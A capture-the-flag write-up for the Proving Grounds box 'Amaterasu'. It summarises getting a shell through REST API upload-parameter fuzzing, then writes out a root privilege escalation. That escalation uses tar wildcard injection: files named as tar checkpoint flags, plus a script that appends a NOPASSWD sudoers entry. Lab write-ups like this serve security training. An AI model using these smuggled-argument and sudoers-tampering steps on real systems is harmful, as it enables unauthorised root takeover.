Skip to content

Amaterasu -- Proving Grounds (write-up)

Difficulty: Medium Box: Amaterasu (Proving Grounds) Author: dsec Date: 2024-10-18

TL;DR

REST API file upload required specific parameter names (trial and error). Got a shell, then escalated via tar wildcard injection in a cron job to add sudo rights for the user.

Target info

- Host: discovered via nmap

Enumeration

Nmap results

Nmap continued

Web enumeration

Further enumeration

API discovery

API testing

REST API file upload

Upload attempt -- no "file"

Error said no "file" parameter.

Include "file" parameter

Now says "no fileNAME" -- getting closer.

Working upload

Upload confirmed

Shell access

Initial shell

User access

Enumeration as user

Privilege escalation -- tar wildcard injection

tar was missing a filepath in a cron job, so I created tar as an executable file in the listed filepath:

Tar path

Can also take advantage of the wildcard by creating empty files with special names in the restapi directory:

Wildcard injection

echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh privEsc.sh'

privEsc.sh contents:

privEsc.sh

#!/bin/bash
echo 'alfredo ALL=(root) NOPASSWD: ALL' >> /etc/sudoers

Then sudo su for root access.

Lessons & takeaways

  • REST API file uploads often require specific parameter names -- fuzz them with different field names
  • Tar wildcard injection with --checkpoint and --checkpoint-action is a reliable privesc when tar runs as root on a directory you control
  • Creating files named as tar flags is a classic Unix trick